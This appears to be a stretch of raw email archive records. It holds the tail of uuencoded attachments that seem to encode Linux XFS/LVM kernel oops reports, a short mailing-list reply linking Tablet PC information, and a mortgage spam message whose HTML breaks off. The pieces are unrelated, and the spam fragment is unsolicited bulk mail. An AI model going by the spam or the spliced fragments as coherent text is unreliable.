 M-R\W,#X*(" Q,3H@(" X.2!F," @(" @(" @(" @(" @(" @(" @(&amp;UO=B @
 M(" E97-I+"5E87@*0V]D93L@(&amp;,P,3)B9&amp;4Y(#QU;FQO8VM?&lt;&amp;%G92LU.2\W
 M,#X*(" Q,SH@(" S,2 P," @(" @(" @(" @(" @(" @(" @('AO&lt;B @(" E
 +96%X+"@E96%X*0H`
 `
 end
 begin 666 oops2.dat
 M=&amp;5S=&amp;5D.B R+C0N,3DM&gt;&amp;9S("A31TDG&lt;R!#5E,@;VX@075G(#$W*0I.3U1%
 M.B!-;W5N=&amp;EN9R!X9G,@9FEL92!S&gt;7-T96T@=VET:"!Q=6]T82!E;F%B;&amp;5D
 M+"!C&lt;F5A=&amp;5D(&amp;]N('1O&lt;"!O9B!,5DT@*R!-1"P@&lt;V]M971I;65S(&amp;=E;F5R
 M871E&lt;R!K97)N96P@;V]P&lt;PH*/3T]/3T]/3T]/3T]/3T]/3T@8V]M;6%N9',@
 M97AC=71E9" ]/3T]/3T]/3T]/3T]/3T]/3T*"FQV8W)E871E("U,,4&lt;@+6YV
 M;VPQ('9G"FUK9G,N&gt;&amp;9S("UF("UD('-U;FET/3@L&lt;W=I9'1H/3@@+V1E=B]V
 M9R]V;VPQ"FUO=6YT("]D978O=F&lt;O=F]L,2 O;6YT+W9O;#$@+6]N;V%T:6UE
 M+&amp;YO9&amp;ER871I;64L=7-R&lt;75O=&amp;$L9W)P&lt;75O=&amp;$*"CT]/3T]/3T]/3T]/3T]
 M/3T](&amp;-A=" O&lt;')O8R]M9'-T870@/3T]/3T]/3T]/3T]/3T]/3T]"@I097)S
 M;VYA;&amp;ET:65S(#H@6W)A:60P72!;&lt;F%I9#%=(%MR86ED-5T@"G)E861?86AE
 M860@,3 R-"!S96-T;W)S"FUD," Z(&amp;%C=&amp;EV92!R86ED-2!S9&amp;1;,UT@&lt;V1C
 M6S)=('-D8ELQ72!S9&amp;%;,%T*(" @(" @,CDS,#4W,#@X(&amp;)L;V-K&lt;R!L979E
 M;" U+" V-&amp;L@8VAU;FLL(&amp;%L9V]R:71H;2 P(%LT+S1=(%M5555570H@(" @
 M(" *=6YU&lt;V5D(&amp;1E=FEC97,Z(#QN;VYE/@H*/3T]/3T]/3T]/3T]/3T]/3T]
 M/3T]/2!K&lt;WEM;V]P&lt;R ]/3T]/3T]/3T]/3T]/3T]/3T]/3T*:W-Y;6]O&lt;',@
 M,BXT+C$@;VX@:38X-B R+C0N,3DN("!/&lt;'1I;VYS('5S960*(" @(" M5B H
 M9&amp;5F875L="D*(" @(" M:R O&lt;')O8R]K&lt;WEM&lt;R H9&amp;5F875L="D*(" @(" M
 M;" O&lt;')O8R]M;V1U;&amp;5S("AD969A=6QT*0H@(" @("UO("]L:6(O;6]D=6QE
 M&lt;R\R+C0N,3DO("AD969A=6QT*0H@(" @("UM("]B;V]T+U-Y&lt;W1E;2YM87 M
 M,BXT+C$Y("AD969A=6QT*0H*5V%R;FEN9SH@66]U(&amp;1I9"!N;W0@=&amp;5L;"!M
 M92!W:&amp;5R92!T;R!F:6YD('-Y;6)O;"!I;F9O&lt;FUA=&amp;EO;BX@($D@=VEL; IA
 M&lt;W-U;64@=&amp;AA="!T:&amp;4@;&amp;]G(&amp;UA=&amp;-H97,@=&amp;AE(&amp;ME&lt;FYE;"!A;F0@;6]D
 M=6QE&lt;R!T:&amp;%T(&amp;%R92!R=6YN:6YG"G)I9VAT(&amp;YO=R!A;F0@22=L;"!U&lt;V4@
 M=&amp;AE(&amp;1E9F%U;'0@;W!T:6]N&lt;R!A8F]V92!F;W(@&lt;WEM8F]L(')E&lt;V]L=71I
 M;VXN"DEF('1H92!C=7)R96YT(&amp;ME&lt;FYE;"!A;F0O;W(@;6]D=6QE&lt;R!D;R!N
 M;W0@;6%T8V@@=&amp;AE(&amp;QO9RP@&gt;6]U(&amp;-A;B!G970*;6]R92!A8V-U&lt;F%T92!O
 M=71P=70@8GD@=&amp;5L;&amp;EN9R!M92!T:&amp;4@:V5R;F5L('9E&lt;G-I;VX@86YD('=H
 M97)E('1O(&amp;9I;F0*;6%P+"!M;V1U;&amp;5S+"!K&lt;WEM&lt;R!E=&amp;,N("!K&lt;WEM;V]P
 M&lt;R M:"!E&gt;'!L86EN&lt;R!T:&amp;4@;W!T:6]N&lt;RX*"FME&lt;FYE;"!"54&lt;@870@9FEL
 M96UA&lt;"YC.C@T,R$*:6YV86QI9"!O&lt;&amp;5R86YD.B P,# P"D-053H@(" @,0I%
 M25 Z(" @(# P,3 Z6SQC,#$R8F1D-CY=(" @($YO="!T86EN=&amp;5D"E5S:6YG
 M(&amp;1E9F%U;'1S(&amp;9R;VT@:W-Y;6]O&lt;',@+70@96QF,S(M:3,X-B M82!I,S@V
 M"D5&amp;3$%'4SH@,# P,3 R-#8*96%X.B!C,6$R9#9A," @(&amp;5B&gt;#H@8S S83=D
 M,30@("!E8W@Z(# P,# P,#$V(" @961X.B P,# P,# P, IE&lt;VDZ(&amp;,Q8S R
 M,3(P(" @961I.B!F-C0T93,P," @(&amp;5B&lt;#H@,# P,# P,#$@("!E&lt;W Z(&amp;8V
 M-C&lt;S.#0P"F1S.B P,#$X(" @97,Z(# P,3@@("!S&lt;SH@,# Q. I0&lt;F]C97-S
 M(&amp;UO=6YT("AP:60Z(#$S,S@L('-T86-K&lt;&amp;%G93UF-C8W,S P,"D*4W1A8VLZ
 M(# P,# P,# Q(&amp;8V-S1E.6$P(&amp;,P,C0U93&lt;V(&amp;,Q83)D-F$P(&amp;9F9F9F9F8T
 M(# P,# P,6)C(&amp;8W-38V,V8T(# P,# P,#!C"B @(" @("!F-C&lt;V,65C," P
 M,# P,# P," P,# P,# P,"!F-F$Q,#0P,"!C,#(T-65B,2!F-C&lt;V,65C," P
 M,# P,# P,2 P,# P,# P,0H@(" @(" @8S R9#DR,S@@9C8W-C%E8S @,# P
 M,# P,#$@,# P,# P,# @,# P,# P,#$@,# P,# P,# @,# P,# P-V,@9F9F
 M9F9F9F,*0V%L;"!4&lt;F%C93H@(" @6SQC,#(T-64W-CY=(%L\8S R-#5E8C$^
 M72!;/&amp;,P,F0Y,C,X/ET@6SQC,#)D.34W,SY=(%L\8S R9&amp;-A.64^70H@(%L\
 M8S R93-B-68^72!;/&amp;,P,C&lt;Q.65A/ET@6SQC,#(T-65A,#Y=(%L\8S R-#8R
 M9&amp;$^72!;/&amp;,P,C0V-#=D/ET@6SQC,#(T-CDP8SY="B @6SQC,#(T-C4X.3Y=
 M(%L\8S R-#1F-&amp;0^72!;/&amp;,P,C0T9F$T/ET@6SQC,#(T-6,R-CY=(%L\8S R
 M-#4U,C(^72!;/&amp;,P,C,Y9#4Q/ET*("!;/&amp;,P,C(R.3 S/ET@6SQC,#(R83,Y
 M,SY=(%L\8S Q9C$S.3D^72!;/&amp;,P,68Q,&amp;(P/ET@6SQC,#%E9CEF83Y=(%L\
 M8S R,S0Y9F(^70H@(%L\8S R,S,V8F(^72!;/&amp;,P,C,S-S P/ET@6SQC,#(S
 M8F5D-#Y=(%L\8S R,V,P,&amp;(^72!;/&amp;,P,C1E9C(V/ET@6SQC,#$T,&amp;1D8SY=
 M"B @6SQC,#$T,&amp;9E8SY=(%L\8S Q-3)F838^72!;/&amp;,P,3$V-C8P/ET@6SQC
 M,#$P.&amp;0R8SY=(%L\8S Q-3,R-F(^72!;/&amp;,P,34S,&amp;)C/ET*("!;/&amp;,P,34S
 M-CDT/ET@6SQC,#$P.&amp;,S8CY="D-O9&amp;4Z(#!F(#!B(#1B(# S(#0Y(&amp;5A(#,T
 M(&amp;,P(#AD(#0V(# T(#,Y(#0V(# T(#&lt;T(#$P(#5B(#@Y(&amp;8P(#,Q"@H^/D5)
 M4#L@8S Q,F)D9#8@/'5N;&amp;]C:U]P86=E*S0V+S&lt;P/B @(#P]/3T]/0I4&lt;F%C
 M93L@8S R-#5E-S8@/%]E;F1?&lt;&amp;%G96)U9E]P86=E7VEO7VUU;'1I*V8V+S$R
 M,#X*5')A8V4[(&amp;,P,C0U96(Q(#Q?96YD7VEO7VUU;'1I7V9U;&amp;PK,3$O,C ^
 M"E1R86-E.R!C,#)D.3(S." \:&amp;%N9&amp;QE7W-T&lt;FEP92MD93@O9C4P/@I4&lt;F%C
 M93L@8S R9#DU-S,@/')A:60U7VUA:V5?&lt;F5Q=65S="LQ,#,O,3,P/@I4&lt;F%C
 M93L@8S R9&amp;-A.64@/&amp;UD7VUA:V5?&lt;F5Q=65S="LS92\W,#X*5')A8V4[(&amp;,P
 M,F4S8C5F(#QL=FU?;6%K95]R97%U97-T7V9N*V8O,C ^"E1R86-E.R!C,#(W
 M,3EE82 \9V5N97)I8U]M86ME7W)E&lt;75E&lt;W0K,3!A+S$R,#X*5')A8V4[(&amp;,P
 M,C0U96$P(#Q?96YD7VEO7VUU;'1I7V9U;&amp;PK,"\R,#X*5')A8V4[(&amp;,P,C0V
 M,F1A(#Q?&lt;&amp;%G96)U9E]P86=E7VEO*S-F82\T-S ^"E1R86-E.R!C,#(T-C0W
 M9" \7W!A9V5?8G5F7W!A9V5?87!P;'DK,3)D+S$T,#X*5')A8V4[(&amp;,P,C0V
 M.3!C(#Q?&lt;&amp;%G96)U9E]S96=M96YT7V%P&lt;&amp;QY*V%C+S$Q,#X*5')A8V4[(&amp;,P
 M,C0V-3@Y(#QP86=E8G5F7VEO&lt;F5Q=65S="MF.2\Q-3 ^"E1R86-E.R!C,#(T
 M-&amp;8T9" \7W!A9V5B=69?;&amp;]O:W5P7W!A9V5S*S$V9"\R9C ^"E1R86-E.R!C
 M,#(T-&amp;9A-" \7W!A9V5B=69?;&amp;]O:W5P7W!A9V5S*S%C-"\R9C ^"E1R86-E
 M.R!C,#(T-6,R-B \&lt;&amp;%G96)U9E]I;W-T87)T*S@V+V$P/@I4&lt;F%C93L@8S R
 M-#4U,C(@/'!A9V5B=69?9V5T*V4R+S$R,#X*5')A8V4[(&amp;,P,C,Y9#4Q(#QX
 M9G-?=')A;G-?&lt;F5A9%]B=68K-#$O,S0P/@I4&lt;F%C93L@8S R,C(Y,#,@/'AF
 M&lt;U]I86QL;V-?&lt;F5A9%]A9VDK-#,O9# ^"E1R86-E.R!C,#(R83,Y,R \&gt;&amp;9S
 M7V)U;&amp;MS=&amp;%T*S%B,R]B.# ^"E1R86-E.R!C,#%F,3,Y.2 \&gt;&amp;9S7W%M7W%U
 M;W1A8VAE8VLK8SDO,34P/@I4&lt;F%C93L@8S Q9C$P8C @/'AF&lt;U]Q;5]D&lt;75S
 M86=E7V%D:G5S="LP+S(R,#X*5')A8V4[(&amp;,P,65F.69A(#QX9G-?&lt;6U?;6]U
 M;G1?&lt;75O=&amp;%S*S$Y82\R-# ^"E1R86-E.R!C,#(S-#EF8B \&gt;&amp;9S7VUO=6YT
 M9G,K9C!B+S$P,# ^"E1R86-E.R!C,#(S,S9B8B \&gt;&amp;9S7W)E861S8BLS8B]C
 M,#X*5')A8V4[(&amp;,P,C,S-S P(#QX9G-?&lt;F5A9'-B*S@P+V,P/@I4&lt;F%C93L@
 M8S R,V)E9#0@/'AF&lt;U]C;6]U;G1F&lt;RLU-S0O-C$P/@I4&lt;F%C93L@8S R,V,P
 M,&amp;(@/'AF&lt;U]M;W5N="LT8B\V,#X*5')A8V4[(&amp;,P,C1E9C(V(#QL:6YV9G-?
 M&lt;F5A9%]S=7!E&lt;BMF-B\R-# ^"E1R86-E.R!C,#$T,&amp;1D8R \9V5T7W-B7V)D
 M978K,C)C+S)B,#X*5')A8V4[(&amp;,P,30P9F5C(#QD;U]K97)N7VUO=6YT*S5C
 M+S$Q,#X*5')A8V4[(&amp;,P,34R9F$V(#QD;U]A9&amp;1?;6]U;G0K-S8O,30P/@I4
 M&lt;F%C93L@8S Q,38V-C @/&amp;1O7W!A9V5?9F%U;'0K,"\T9F(^"E1R86-E.R!C
 M,#$P.&amp;0R8R \97)R;W)?8V]D92LS-"\S8SX*5')A8V4[(&amp;,P,34S,C9B(#QD
 M;U]M;W5N="LQ-6(O,3@P/@I4&lt;F%C93L@8S Q-3,P8F,@/&amp;-O&lt;'E?;6]U;G1?
 M;W!T:6]N&lt;RLT8R]A,#X*5')A8V4[(&amp;,P,34S-CDT(#QS&gt;7-?;6]U;G0K830O
 M,3 P/@I4&lt;F%C93L@8S Q,#AC,V(@/'-Y&lt;W1E;5]C86QL*S,S+S,X/@I#;V1E
 M.R @8S Q,F)D9#8@/'5N;&amp;]C:U]P86=E*S0V+S&lt;P/@HP,# P,# P," \7T5)
 M4#XZ"D-O9&amp;4[("!C,#$R8F1D-B \=6YL;V-K7W!A9V4K-#8O-S ^(" @/#T]
 M/3T]"B @(# Z(" @,&amp;8@,&amp;(@(" @(" @(" @(" @(" @(" @("!U9#)A(" @
 M(" @/#T]/3T]"D-O9&amp;4[("!C,#$R8F1D." \=6YL;V-K7W!A9V4K-#@O-S ^
 M"B @(#(Z(" @-&amp;(@(" @(" @(" @(" @(" @(" @(" @("!D96,@(" @)65B
 M&gt; I#;V1E.R @8S Q,F)D9#D@/'5N;&amp;]C:U]P86=E*S0Y+S&lt;P/@H@(" S.B @
 M(# S(#0Y(&amp;5A(" @(" @(" @(" @(" @(" @861D(" @(#!X9F9F9F9F96$H
 M)65C&gt;"DL)65C&gt; I#;V1E.R @8S Q,F)D9&amp;,@/'5N;&amp;]C:U]P86=E*S1C+S&lt;P
 M/@H@(" V.B @(#,T(&amp;,P(" @(" @(" @(" @(" @(" @(" @&gt;&amp;]R(" @("0P
 M&gt;&amp;,P+"5A; I#;V1E.R @8S Q,F)D9&amp;4@/'5N;&amp;]C:U]P86=E*S1E+S&lt;P/@H@
 M(" X.B @(#AD(#0V(# T(" @(" @(" @(" @(" @(" @;&amp;5A(" @(#!X-"@E
 M97-I*2PE96%X"D-O9&amp;4[("!C,#$R8F1E,2 \=6YL;V-K7W!A9V4K-3$O-S ^
 M"B @(&amp;(Z(" @,SD@-#8@,#0@(" @(" @(" @(" @(" @("!C;7 @(" @)65A
 M&gt;"PP&gt;#0H)65S:2D*0V]D93L@(&amp;,P,3)B9&amp;4T(#QU;FQO8VM?&lt;&amp;%G92LU-"\W
 M,#X*(" @93H@(" W-" Q," @(" @(" @(" @(" @(" @(" @(&amp;IE(" @(" R
 M," \7T5)4"LP&gt;#(P/B!C,#$R8F1F-B \=6YL;V-K7W!A9V4K-C8O-S ^"D-O
 M9&amp;4[("!C,#$R8F1E-B \=6YL;V-K7W!A9V4K-38O-S ^"B @,3 Z(" @-6(@
 M(" @(" @(" @(" @(" @(" @(" @("!P;W @(" @)65B&gt; I#;V1E.R @8S Q
 M,F)D93&lt;@/'5N;&amp;]C:U]P86=E*S4W+S&lt;P/@H@(#$Q.B @(#@Y(&amp;8P(" @(" @
 M(" @(" @(" @(" @(" @;6]V(" @("5E&lt;VDL)65A&gt; I#;V1E.R @8S Q,F)D
 M93D@/'5N;&amp;]C:U]P86=E*S4Y+S&lt;P/@H@(#$S.B @(#,Q(# P(" @(" @(" @
 M(" @(" @(" @(" @&gt;&amp;]R(" @("5E87@L*"5E87@I"@H*-B!W87)N:6YG&lt;R!I
 E&lt;W-U960N("!297-U;'1S(&amp;UA&gt;2!N;W0@8F4@&lt;F5L:6%B;&amp;4N"@``
 `
 end
 begin 666 oops3.dat
 M=&amp;5S=&amp;5D.B R+C0N,3DM&gt;&amp;9S("A31TDG&lt;R!#5E,@;VX@075G(#$W*0I.3U1%
 M.B!-;W5N=&amp;EN9R!X9G,@9FEL92!S&gt;7-T96T@8W)E871E9"!O;B!T;W @;V8@
 M3%9-("L@340L('=H:6QE($U$(&amp;ES(&amp;EN(&amp;1E9W)A9&amp;5D(&amp;UO9&amp;4@86QW87ES
 M(&amp;=E;F5R871E&lt;R!K97)N96P@;V]P&lt;PH*/3T]/3T]/3T]/3T]/3T]/3T@8V]M
 M;6%N9',@97AC=71E9" ]/3T]/3T]/3T]/3T]/3T]/3T*"FQV8W)E871E("U,
 M,4&lt;@+6YV;VPQ('9G"FUK9G,N&gt;&amp;9S("UF("UD('-U;FET/3@L&lt;W=I9'1H/3@@
 M+V1E=B]V9R]V;VPQ"FUO=6YT("]D978O=F&lt;O=F]L,2 O;6YT+W9O;#$@+6]N
 M;V%T:6UE+&amp;YO9&amp;ER871I;64*"CT]/3T]/3T]/3T]/3T]/3T](&amp;-A=" O&lt;')O
 M8R]M9'-T870@/3T]/3T]/3T]/3T]/3T]/3T]"@I097)S;VYA;&amp;ET:65S(#H@
 M6W)A:60P72!;&lt;F%I9#%=(%MR86ED-5T@"G)E861?86AE860@,3 R-"!S96-T
 M;W)S"FUD," Z(&amp;%C=&amp;EV92!R86ED-2!S9&amp;-;,ET@&lt;V1B6S%=('-D85LP70H@
 M(" @(" R.3,P-3&lt;P.#@@8FQO8VMS(&amp;QE=F5L(#4L(#8T:R!C:'5N:RP@86QG
 M;W)I=&amp;AM(# @6S0O,UT@6U5555]="B @(" @( IU;G5S960@9&amp;5V:6-E&lt;SH@
 M/&amp;YO;F4^"@H]/3T]/3T]/3T]/3T]/3T]/3T]/3T](&amp;MS&gt;6UO;W!S(#T]/3T]
 M/3T]/3T]/3T]/3T]/3T]/0IK&lt;WEM;V]P&lt;R R+C0N,2!O;B!I-C@V(#(N-"XQ
 M.2X@($]P=&amp;EO;G,@=7-E9 H@(" @("U6("AD969A=6QT*0H@(" @("UK("]P
 M&lt;F]C+VMS&gt;6US("AD969A=6QT*0H@(" @("UL("]P&lt;F]C+VUO9'5L97,@*&amp;1E
 M9F%U;'0I"B @(" @+6\@+VQI8B]M;V1U;&amp;5S+S(N-"XQ.2\@*&amp;1E9F%U;'0I
 M"B @(" @+6T@+V)O;W0O4WES=&amp;5M+FUA&lt;"TR+C0N,3D@*&amp;1E9F%U;'0I"@I7
 M87)N:6YG.B!9;W4@9&amp;ED(&amp;YO="!T96QL(&amp;UE('=H97)E('1O(&amp;9I;F0@&lt;WEM
 M8F]L(&amp;EN9F]R;6%T:6]N+B @22!W:6QL"F%S&lt;W5M92!T:&amp;%T('1H92!L;V&lt;@
 M;6%T8VAE&lt;R!T:&amp;4@:V5R;F5L(&amp;%N9"!M;V1U;&amp;5S('1H870@87)E(')U;FYI
 M;F&lt;*&lt;FEG:'0@;F]W(&amp;%N9"!))VQL('5S92!T:&amp;4@9&amp;5F875L="!O&lt;'1I;VYS
 M(&amp;%B;W9E(&amp;9O&lt;B!S&gt;6UB;VP@&lt;F5S;VQU=&amp;EO;BX*268@=&amp;AE(&amp;-U&lt;G)E;G0@
 M:V5R;F5L(&amp;%N9"]O&lt;B!M;V1U;&amp;5S(&amp;1O(&amp;YO="!M871C:"!T:&amp;4@;&amp;]G+"!Y
 M;W4@8V%N(&amp;=E= IM;W)E(&amp;%C8W5R871E(&amp;]U='!U="!B&gt;2!T96QL:6YG(&amp;UE
 M('1H92!K97)N96P@=F5R&lt;VEO;B!A;F0@=VAE&lt;F4@=&amp;\@9FEN9 IM87 L(&amp;UO
 M9'5L97,L(&amp;MS&gt;6US(&amp;5T8RX@(&amp;MS&gt;6UO;W!S("UH(&amp;5X&lt;&amp;QA:6YS('1H92!O
 M&lt;'1I;VYS+@H*:V5R;F5L($)51R!A="!F:6QE;6%P+F,Z.#0S(0II;G9A;&amp;ED
 M(&amp;]P97)A;F0Z(# P,# *0U!5.B @(" P"D5)4#H@(" @,# Q,#I;/&amp;,P,3)B
 M9&amp;0V/ET@(" @3F]T('1A:6YT960*57-I;F&lt;@9&amp;5F875L=',@9G)O;2!K&lt;WEM
 M;V]P&lt;R M="!E;&amp;8S,BUI,S@V("UA(&amp;DS.#8*149,04=3.B P,# Q,#(T-@IE
 M87@Z(&amp;,Q.&amp;-D.34P(" @96)X.B!C,#-A-V0Q-" @(&amp;5C&gt;#H@,# P,# P,38@
 M("!E9'@Z(# P,# P,# P"F5S:3H@8S%C,#)A8S@@("!E9&amp;DZ(&amp;5F,#EE96,P
 M(" @96)P.B P,# P,# P,2 @(&amp;5S&lt;#H@968P-F9A-&amp;,*9',Z(# P,3@@("!E
 M&lt;SH@,# Q." @('-S.B P,#$X"E!R;V-E&lt;W,@;6]U;G0@*'!I9#H@,3 Y-3@L
 M('-T86-K&lt;&amp;%G93UE9C V9C P,"D*4W1A8VLZ(# P,# P,# Q(&amp;,U,#&lt;X8S0P
 M(&amp;,P,C0U93&lt;V(&amp;,Q.&amp;-D.34P(# P,# P,# P(# P,# P,C4T(# X,&amp;0W83@P
 M(# P,# P,# P"B @(" @("!C.&amp;9F8S5C," P,# P,# P," P,# P,# P,"!E
 M.39E,S@P,"!C,#(T-65B,2!C.&amp;9F8S5C," P,# P,# P,2 P,# P,# P,0H@
 M(" @(" @8S R9#DR,S@@8SAF9F,U8S @,# P,# P,#$@,# P,# P,# @,# P
 M,# P,# @,# P,# R-30@,# P,# P-V,@9F9F9F9F9F,*0V%L;"!4&lt;F%C93H@
 M(" @6SQC,#(T-64W-CY=(%L\8S R-#5E8C$^72!;/&amp;,P,F0Y,C,X/ET@6SQC
 M,#$S-#0Y,3Y=(%L\8S R9#DU-S,^70H@(%L\8S R9&amp;-A.64^72!;/&amp;,P,F4S
 M8C5F/ET@6SQC,#(W,3EE83Y=(%L\8S R-#5E83 ^72!;/&amp;,P,C0V,F1A/ET@
 M6SQC,#(T-C0W9#Y="B @6SQC,#(T-CDP8SY=(%L\8S R-#8U.#D^72!;/&amp;,P
 M,C0T9C1D/ET@6SQC,#(T-&amp;9A-#Y=(%L\8S R-#5C,C8^72!;/&amp;,P,C0U-3(R
 M/ET*("!;/&amp;,P,C,S-F$Q/ET@6SQC,#(S8F0T93Y=(%L\8S R,V,P,&amp;(^72!;
 M/&amp;,P,C1E9C(V/ET@6SQC,#$T,&amp;1D8SY=(%L\8S Q,34P,V8^70H@(%L\8S Q
 M-#!F96,^72!;/&amp;,P,34R9F$V/ET@6SQC,#$Q-C8V,#Y=(%L\8S Q,#AD,F,^
 M72!;/&amp;,P,34S,C9B/ET@6SQC,#$U,S!B8SY="B @6SQC,#$U,S8Y-#Y=(%L\
 M8S Q,#AC,V(^70I#;V1E.B P9B P8B T8B P,R T.2!E82 S-"!C," X9" T
 M-B P-" S.2 T-B P-" W-" Q," U8B X.2!F," S,0H*/CY%25 [(&amp;,P,3)B
 M9&amp;0V(#QU;FQO8VM?&lt;&amp;%G92LT-B\W,#X@(" \/3T]/3T*5')A8V4[(&amp;,P,C0U
 M93&lt;V(#Q?96YD7W!A9V5B=69?&lt;&amp;%G95]I;U]M=6QT:2MF-B\Q,C ^"E1R86-E
 M.R!C,#(T-65B,2 \7V5N9%]I;U]M=6QT:5]F=6QL*S$Q+S(P/@I4&lt;F%C93L@
 M8S R9#DR,S@@/&amp;AA;F1L95]S=')I&lt;&amp;4K9&amp;4X+V8U,#X*5')A8V4[(&amp;,P,3,T
 M-#DQ(#Q?7V%L;&amp;]C7W!A9V5S*S0Q+S$X,#X*5')A8V4[(&amp;,P,F0Y-3&lt;S(#QR
 M86ED-5]M86ME7W)E&lt;75E&lt;W0K,3 S+S$S,#X*5')A8V4[(&amp;,P,F1C83EE(#QM
 M9%]M86ME7W)E&lt;75E&lt;W0K,V4O-S ^"E1R86-E.R!C,#)E,V(U9B \;'9M7VUA
 M:V5?&lt;F5Q=65S=%]F;BMF+S(P/@I4&lt;F%C93L@8S R-S$Y96$@/&amp;=E;F5R:6-?
 M;6%K95]R97%U97-T*S$P82\Q,C ^"E1R86-E.R!C,#(T-65A," \7V5N9%]I
 M;U]M=6QT:5]F=6QL*S O,C ^"E1R86-E.R!C,#(T-C)D82 \7W!A9V5B=69?
 M&lt;&amp;%G95]I;RLS9F$O-#&lt;P/@I4&lt;F%C93L@8S R-#8T-V0@/%]P86=E7V)U9E]P
 M86=E7V%P&lt;&amp;QY*S$R9"\Q-# ^"E1R86-E.R!C,#(T-CDP8R \7W!A9V5B=69?
 M&lt;V5G;65N=%]A&lt;'!L&gt;2MA8R\Q,3 ^"E1R86-E.R!C,#(T-C4X.2 \&lt;&amp;%G96)U
 M9E]I;W)E&lt;75E&lt;W0K9CDO,34P/@I4&lt;F%C93L@8S R-#1F-&amp;0@/%]P86=E8G5F
 M7VQO;VMU&lt;%]P86=E&lt;RLQ-F0O,F8P/@I4&lt;F%C93L@8S R-#1F830@/%]P86=E
 M8G5F7VQO;VMU&lt;%]P86=E&lt;RLQ8S0O,F8P/@I4&lt;F%C93L@8S R-#5C,C8@/'!A
 M9V5B=69?:6]S=&amp;%R="LX-B]A,#X*5')A8V4[(&amp;,P,C0U-3(R(#QP86=E8G5F
 M7V=E="ME,B\Q,C ^"E1R86-E.R!C,#(S,S9A,2 \&gt;&amp;9S7W)E861S8BLR,2]C
 M,#X*5')A8V4[(&amp;,P,C-B9#1E(#QX9G-?8VUO=6YT9G,K,V5E+S8Q,#X*5')A
 M8V4[(&amp;,P,C-C,#!B(#QX9G-?;6]U;G0K-&amp;(O-C ^"E1R86-E.R!C,#(T968R
 M-B \;&amp;EN=F9S7W)E861?&lt;W5P97(K9C8O,C0P/@I4&lt;F%C93L@8S Q-#!D9&amp;,@
 M/&amp;=E=%]S8E]B9&amp;5V*S(R8R\R8C ^"E1R86-E.R!C,#$Q-3 S9B \&lt;VUP7V%P
 M:6-?=&amp;EM97)?:6YT97)R=7!T*V5F+S$R,#X*5')A8V4[(&amp;,P,30P9F5C(#QD
 M;U]K97)N7VUO=6YT*S5C+S$Q,#X*5')A8V4[(&amp;,P,34R9F$V(#QD;U]A9&amp;1?
 M;6]U;G0K-S8O,30P/@I4&lt;F%C93L@8S Q,38V-C @/&amp;1O7W!A9V5?9F%U;'0K
 M,"\T9F(^"E1R86-E.R!C,#$P.&amp;0R8R \97)R;W)?8V]D92LS-"\S8SX*5')A
 M8V4[(&amp;,P,34S,C9B(#QD;U]M;W5N="LQ-6(O,3@P/@I4&lt;F%C93L@8S Q-3,P
 M8F,@/&amp;-O&lt;'E?;6]U;G1?;W!T:6]N&lt;RLT8R]A,#X*5')A8V4[(&amp;,P,34S-CDT
 M(#QS&gt;7-?;6]U;G0K830O,3 P/@I4&lt;F%C93L@8S Q,#AC,V(@/'-Y&lt;W1E;5]C
 M86QL*S,S+S,X/@I#;V1E.R @8S Q,F)D9#8@/'5N;&amp;]C:U]P86=E*S0V+S&lt;P
 M/@HP,# P,# P," \7T5)4#XZ"D-O9&amp;4[("!C,#$R8F1D-B \=6YL;V-K7W!A
 M9V4K-#8O-S ^(" @/#T]/3T]"B @(# Z(" @,&amp;8@,&amp;(@(" @(" @(" @(" @
 M(" @(" @("!U9#)A(" @(" @/#T]/3T]"D-O9&amp;4[("!C,#$R8F1D." \=6YL
 M;V-K7W!A9V4K-#@O-S ^"B @(#(Z(" @-&amp;(@(" @(" @(" @(" @(" @(" @
 M(" @("!D96,@(" @)65B&gt; I#;V1E.R @8S Q,F)D9#D@/'5N;&amp;]C:U]P86=E
 M*S0Y+S&lt;P/@H@(" S.B @(# S(#0Y(&amp;5A(" @(" @(" @(" @(" @(" @861D
 M(" @(#!X9F9F9F9F96$H)65C&gt;"DL)65C&gt; I#;V1E.R @8S Q,F)D9&amp;,@/'5N
 M;&amp;]C:U]P86=E*S1C+S&lt;P/@H@(" V.B @(#,T(&amp;,P(" @(" @(" @(" @(" @
 M(" @(" @&gt;&amp;]R(" @("0P&gt;&amp;,P+"5A; I#;V1E.R @8S Q,F)D9&amp;4@/'5N;&amp;]C
 M:U]P86=E*S1E+S&lt;P/@H@(" X.B @(#AD(#0V(# T(" @(" @(" @(" @(" @
 M(" @;&amp;5A(" @(#!X-"@E97-I*2PE96%X"D-O9&amp;4[("!C,#$R8F1E,2 \=6YL
 M;V-K7W!A9V4K-3$O-S ^"B @(&amp;(Z(" @,SD@-#8@,#0@(" @(" @(" @(" @
 M(" @("!C;7 @(" @)65A&gt;"PP&gt;#0H)65S:2D*0V]D93L@(&amp;,P,3)B9&amp;4T(#QU
 M;FQO8VM?&lt;&amp;%G92LU-"\W,#X*(" @93H@(" W-" Q," @(" @(" @(" @(" @
 M(" @(" @(&amp;IE(" @(" R," \7T5)4"LP&gt;#(P/B!C,#$R8F1F-B \=6YL;V-K
 M7W!A9V4K-C8O-S ^"D-O9&amp;4[("!C,#$R8F1E-B \=6YL;V-K7W!A9V4K-38O
 M-S ^"B @,3 Z(" @-6(@(" @(" @(" @(" @(" @(" @(" @("!P;W @(" @
 M)65B&gt; I#;V1E.R @8S Q,F)D93&lt;@/'5N;&amp;]C:U]P86=E*S4W+S&lt;P/@H@(#$Q
 M.B @(#@Y(&amp;8P(" @(" @(" @(" @(" @(" @(" @;6]V(" @("5E&lt;VDL)65A
 M&gt; I#;V1E.R @8S Q,F)D93D@/'5N;&amp;]C:U]P86=E*S4Y+S&lt;P/@H@(#$S.B @
 M(#,Q(# P(" @(" @(" @(" @(" @(" @(" @&gt;&amp;]R(" @("5E87@L*"5E87@I
 M"@H]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]
 +/3T]/3T]/3T]/0H`
 `
 end
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Tablet PC
</t>
  </si>
  <si>
    <t xml:space="preserve">Oh yeah, the link for more info:
 http://www.microsoft.com/windowsxp/tabletpc/default.asp
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: discounted motgages 371812976544333222
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
            &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;&lt;FONT size=2 PTSIZE="10"&gt;
       &lt;TABLE 
